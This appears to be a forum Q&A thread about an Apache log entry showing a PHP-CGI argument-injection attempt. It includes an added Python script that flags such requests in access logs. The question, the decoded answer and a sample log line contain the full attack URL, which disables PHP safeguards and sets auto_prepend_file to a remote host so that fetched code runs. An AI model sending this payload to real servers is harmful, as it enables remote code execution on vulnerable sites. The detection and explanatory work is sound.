
PHP - does this look like a hack attempt

/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F61.19.253.26%2Fecho.txt 

Many of these are creating 404s in my Apache logs. Does this look like a PHP hack attempt?

To me, it does look like a hack attempt.

From the PHP Release Announcement page:

Some systems support a method for supplying a array of strings to the CGI script. This is only used in the case of an `indexed' query. This is identified by a "GET" or "HEAD" HTTP request with a URL search string not containing any unencoded = characters.

The URL-decoded query string looks like this:

/index.php?-dsafe_mode=Off -ddisable_functions=NULL -dallow_url_fopen=On -dallow_url_include=On -dauto_prepend_file=http://61.19.253.26/echo.txt

These are all -d switches, which are used to define php.ini directives. Basically, this is what it changes:

safe_mode=off 
disable_functions=null
allow_url_fopen=on
allow_url_include=on 

And finally, there is auto_prepend_file=http://61.19.253.26/echo.txt -- this directive includes the PHP code located at http://61.19.253.26/echo.txt and executes it before the code inside index.php.

The echo.txt is hosted on a web server somewhere in Thailand and contains <?php echo "dsfer34w5rlsidfosdedfpsd"; ?>. This is probably used to check if your server is vulnerable to attacks.

And if you use Apache mod_cgi / mod_cgid to run a PHP version before 5.3.13 and 5.4.x before 5.4.3, update now: http://www.php.net/downloads.php
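
Added example (not part of either answer): a log check that applies the "indexed query" rule quoted above to Apache access-log lines and lists the php.ini overrides each matching request tried to set. It assumes the common/combined log format; the function names are hypothetical, and the sample lines are constructed, with the first reusing the query string from the question.

```python
import re
from urllib.parse import unquote

# Request target and status from an Apache common/combined log entry.
REQUEST_RE = re.compile(r'"(?:GET|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
REMOTE_SCHEMES = ("http://", "https://", "ftp://")
INCLUDE_DIRECTIVES = ("auto_prepend_file", "auto_append_file")

def cgi_switches(target):
    """Return the command-line style switches an indexed query would carry."""
    _, sep, raw_query = target.partition("?")
    # Indexed query: a search string with no unencoded '=' character.
    if not sep or "=" in raw_query:
        return []
    # Words are separated by '+' and URL-decoded one by one.
    words = [unquote(w) for w in raw_query.split("+") if w]
    return words if words and words[0].startswith("-") else []

def ini_overrides(words):
    """Collect directives given as -dname=value or as -d followed by name=value."""
    overrides = {}
    for word, nxt in zip(words, words[1:] + [""]):
        setting = nxt if word == "-d" else (word[2:] if word.startswith("-d") else "")
        if setting:
            name, _, value = setting.partition("=")
            overrides[name.lower()] = value
    return overrides

def scan(lines):
    """Return one finding per log line whose query string starts with a switch."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        words = cgi_switches(m.group(1)) if m else []
        if not words:
            continue
        ini = ini_overrides(words)
        remote = [v for k, v in ini.items()
                  if k in INCLUDE_DIRECTIVES and v.lower().startswith(REMOTE_SCHEMES)]
        findings.append({"status": int(m.group(2)), "ini": ini, "remote_include": remote})
    return findings

# Constructed sample log lines (client addresses are documentation-range placeholders).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/May/2012:10:00:00 +0000] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F61.19.253.26%2Fecho.txt HTTP/1.1" 404 209',
    '203.0.113.8 - - [10/May/2012:10:00:05 +0000] "GET /index.php?page=2&sort=-date HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/May/2012:10:00:09 +0000] "GET /search.php?php+security HTTP/1.1" 200 1834',
]
```

Only the first sample line is reported: the second contains an unencoded `=`, so it is an ordinary query string, and the third is an indexed query whose first word is not a switch.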

Yes.

Read the following page; it explains everything:

http://huguesjohnson.com/programming/hacking-attempt/
